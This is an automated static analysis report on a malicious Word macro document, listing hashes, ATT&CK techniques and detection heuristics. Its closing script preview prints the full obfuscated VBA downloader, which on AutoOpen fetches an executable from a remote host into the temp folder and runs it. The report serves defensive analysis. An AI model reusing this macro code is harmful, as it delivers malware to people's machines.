Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4a55ca42d2ee70d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 63.5 KB
Created: 2017-02-08 14:04:00
Authoring application: Microsoft Office Word
First seen: 2017-05-03
MD5: df8fb3bdf550e78e59988c3499e84abe
SHA-1: 68db71fc0b82e860c1c77c2039270d1b3135bba1
SHA-256: e4a55ca42d2ee70d0a45aa3d0cc37cb16c2fa68467d956cd50d13096058c42c6
Risk Score: 278

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1071.001 Web Protocols

The sample is a malicious Office document containing VBA macros. The document body appears to be a lure that asks the user to enable macros, framed as necessary for a document conversion. The VBA code references the URLDownloadToFile API, indicating it likely downloads and then executes a second-stage payload. The combination of legacy WordBasic auto-exec markers and VBA macros points to a macro-based downloader.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-5760036-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5760036-0
  • Reference to URLDownloadToFile API (critical) SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA (critical) OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched lines in script:
    Private Declare PtrSafe Function ograk Lib "netapi32" (ByVal yref As Boolean, ByVal rybhy As Long, ByVal uzxexobv As Currency, ByVal darhexcu As Single, ByVal juwvyv As Variant, ByVal yhsovpiw As String, ByVal wsaxmi As Object, ByVal ubomi As String, ByVal ezxytopl As String, ByVal gadi As Long) As String
    Private Declare PtrSafe Function aloba Lib "urlmon" Alias "URLDownloadToFileA" (ByVal igilnet As Long, ByVal linyb As String, ByVal vumume As String, ByVal icykzi As Long, ByVal jcaxfyrxo As Long) As Long
    Private Declare PtrSafe Function lvosdave Lib "gdi32" Alias "rxozig" (ByVal fwinizj As Object, ByVal wehy As Boolean, ByVal zcomeczy As Object, ByVal tninowl As Variant, ByVal qqopuse As String, ByVal eguti As Double, ByVal tega As Object) As Variant
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
    Sub AutoOpen()
    dxyki = "phaseguks"
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched lines in script:
     Else
      amyw = Environ(odganfy()) & fogkowp6()
    ezus = aloba(tosduz, pzydfihe(), amyw, tosduz, tosduz)
  • Reference to ShellExecute API (high) SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                  Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)     6699 bytes
SHA-256: 2ca498cfc0338561a892d2b2302e32d3be6f59c39e1799f7fe611d63f11ed7e1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function dpapxobte Lib "netapi32" (ByVal nzylfyf As Long, ByVal micoq As Long, ByVal imbazziwg As Integer, ByVal ityb As Double, ByVal ipakha As Integer, ByVal aczywex As Variant, ByVal ahfeqsav As Double, ByVal utxobo As Single, ByVal ohyl As Double)
Private Declare PtrSafe Function mlymqa Lib "advapi32" (ByVal nuvyf As Variant, ByVal ititrefr As Currency, ByVal akadl As Integer, ByVal suzolo As Currency, ByVal ympucuf As Byte)
Private Declare PtrSafe Function pufxis Lib "netapi32" Alias "bcevigu" (ByVal vukkyra As Double, ByVal idxumm As Currency, ByVal ydobiwg As Integer, ByVal sgujfi As Object, ByVal yvlevf As Byte, ByVal zfokkabte As Long, ByVal fserfimy As Single, ByVal ukubpa As String, ByVal leguk As Double, ByVal piber As Long, ByVal ascemvuhx As Single)
Private Declare PtrSafe Function ewezm Lib "netapi32" Alias "resadokr" (ByVal kicy As Single, ByVal ukufg As Variant) As Boolean
Private Declare PtrSafe Function dosvacf Lib "gdi32" Alias "awybjig" (ByVal norriql As Byte, ByVal exfos As Variant, ByVal powvewse As Currency, ByVal uqeru As Double, ByVal wudi As Currency) As Integer
Private Declare PtrSafe Function usmysi Lib "netapi32" (ByVal hacaj As Currency, ByVal exduqgi As Double, ByVal cogtazi As Currency)
Private Declare PtrSafe Function ograk Lib "netapi32" (ByVal yref As Boolean, ByVal rybhy As Long, ByVal uzxexobv As Currency, ByVal darhexcu As Single, ByVal juwvyv As Variant, ByVal yhsovpiw As String, ByVal wsaxmi As Object, ByVal ubomi As String, ByVal ezxytopl As String, ByVal gadi As Long) As String
Private Declare PtrSafe Function aloba Lib "urlmon" Alias "URLDownloadToFileA" (ByVal igilnet As Long, ByVal linyb As String, ByVal vumume As String, ByVal icykzi As Long, ByVal jcaxfyrxo As Long) As Long
Private Declare PtrSafe Function lvosdave Lib "gdi32" Alias "rxozig" (ByVal fwinizj As Object, ByVal wehy As Boolean, ByVal zcomeczy As Object, ByVal tninowl As Variant, ByVal qqopuse As String, ByVal eguti As Double, ByVal tega As Object) As Variant
Private Declare PtrSafe Function pyfe Lib "netapi32" (ByVal fnydoj As Byte, ByVal alzurwumq As Double, ByVal thilzodg As Currency, ByVal priqajx As Variant, ByVal izet As Single, ByVal yznuna As Integer, ByVal quru As String, ByVal zwycdusd As Integer, ByVal yjidu As Integer) As Object
Private Declare PtrSafe Function uvgada Lib "gdi32" (ByVal bigoxti As Single, ByVal ikuvmirk As Variant, ByVal pesjipzi As Byte, ByVal sazlogba As Long, ByVal azlajusp As String)
Private Declare PtrSafe Function iqegydj Lib "shell32.dll" Alias "ShellExecuteA" (ByVal erpometj As LongPtr, ByVal xiqizpy As String, ByVal lzocu As String, ByVal jypqokge As String, ByVal xawo As String, ByVal nlopo As Long) As LongPtr
Function ukcafc()
nqeksevacxibjuvofryvbavodiv = 2726
ukcafc = "tem"
End Function

Function bsuqumxo()
ssitnaddunpigazupocidhizxi = 2756
bsuqumxo = "p"
End Function

Function hpemte()
nefzorlosaqbydpifuqnajfashoxenki = 2521
hpemte = "\q"
End Function

Function ovugca()
mcehkiqxedxajokfavyxywozvugawy = 2475
ovugca = "no"
End Function

Function insace()
aqabywxudxovohqefzybehkekpyl = 2810
insace = "lg"
End Function

Function idyxn()
azjuttacmywnyzudagcipysubov = 2317
idyxn = "uv"
End Function

Function wosax()
efagivlyfhonlabluvmolorus = 2246
wosax = ".e"
End Function

Function ynusalp()
iwerrecwarkizqufowojetur = 2860
ynusalp = "xe"
End Function

Function oximbi()
celofidyhubneturgohachon = 2015
oximbi = "ht"
End Function

Function kahibjonx()
opgagqyfegeknytgenvesokoqpu = 2839
kahibjonx = "tp"
End Function

Function kypa()
zrixetmycgyfnajkusqasejesi = 2962
kypa = ":/"
End Function

Function uzegalo()
ycresqizsammypupxeckeppuqija = 2067
uzegalo = "/c"
End Function

Function adapzer()
knurlefipvewxujvykypohgyxpi = 2376
adapzer = "xn"
End Function

Function graxuwpyk()
uwjiqokowzonwewhidbolifguqcakofk = 2869
graxuwpyk = "jd"
End Function

Function ijbonjuzdy()
rohtydjisisuctejpippyncovyqna = 2990
ijbonjuzdy = "fh"
End Function

Function ukic()
gerdibiddycwoxnohasducahyli = 2385
ukic = ".t"
End Function

Function pymabr()
dysolyljumewsohotovelpaxukfu = 2912
pymabr = "op"
End Function

Function upbusib()
proqcikkitorelelbakojexyvpuha = 2687
upbusib = "/o"
End Function

Function ilanpyz()
azegjozissylrecryfponorwunxecevb = 2247
ilanpyz = "ff"
End Function

Function mfovnecyq()
ewevqaxnutnyzanwiwpufemusok = 2598
mfovnecyq = "ic"
End Function

Function agxij()
extuknavqabtadukypurcakzuso = 2557
agxij = "em"
End Function

Function ceqesn()
yhabvoxixarpegjamojketacjodec = 2566
ceqesn = "gm"
End Function

Function jqapkywke()
wberihimqohoqfusehamrepeqyzg = 2189
jqapkywke = "te"
End Function

Function csalruw()
ylmesezrelgastinmiddarombidgaft = 2047
csalruw = ".e"
End Function

Function evygt()
lyqyfwijanesytazyxelywu = 2638
evygt = "xe"
End Function

Function odganfy()
yrivni = "zmuxmevyz"
odganfy = ukcafc() & bsuqumxo()
End Function

Function fogkowp6()
axmopwu = "cixucxifyss"
fogkowp6 = hpemte() & ovugca() & insace() & idyxn() & wosax() & ynusalp()
End Function

Function pzydfihe()
ywyj = "jnyjoccecfoj"
pzydfihe = oximbi() & kahibjonx() & kypa() & uzegalo() & adapzer() & graxuwpyk() & ijbonjuzdy() & ukic() & pymabr() & upbusib() & ilanpyz() & mfovnecyq() & agxij() & ceqesn() & jqapkywke() & csalruw() & evygt()
End Function

Sub AutoOpen()
dxyki = "phaseguks"
tosduz = 0
mhumcefj = "hiwim"
yqeg = "52200"
ylisxo = "yrwa"
liju = "open"
fboso = True
ralo = ""
ujel = "40945"
dmazma = "93328"
yhrap = "boweb"
civry = "bilbizrysv"
acygj = "recubib"
ytjujy = "88050"
If (ytjujy = "ldinqubocp") Then
If (TypeName(fboso) = "Boolean") Then
uwajy = "ehdiw"
ukirer = "14666" + dmazma & uwajy & "epop" + "34613"
yhagcevn = "41055"
quholca = "7380" & yhagcevn + ylisxo + acygj
End If
arkivekqu = "ebiburde"
If (arkivekqu = undefined) Then
olohwerak = Empty
ngyquztu = True
anzumm = "76760"
devo = anzumm & "75379"
xokaluk = 10
ujezonl = 38
ifyw = "76814"
vozwafu = mhumcefj + ifyw & dxyki & yhrap + civry
ozimrus = "lenl"
wyqi = yqeg + ozimrus & ujel

End If

 Else
  amyw = Environ(odganfy()) & fogkowp6()
ezus = aloba(tosduz, pzydfihe(), amyw, tosduz, tosduz)
If ezus = 0 Then
hywda = iqegydj(tosduz, liju, amyw, ralo, ralo, tosduz)
End If
 
End If

End Sub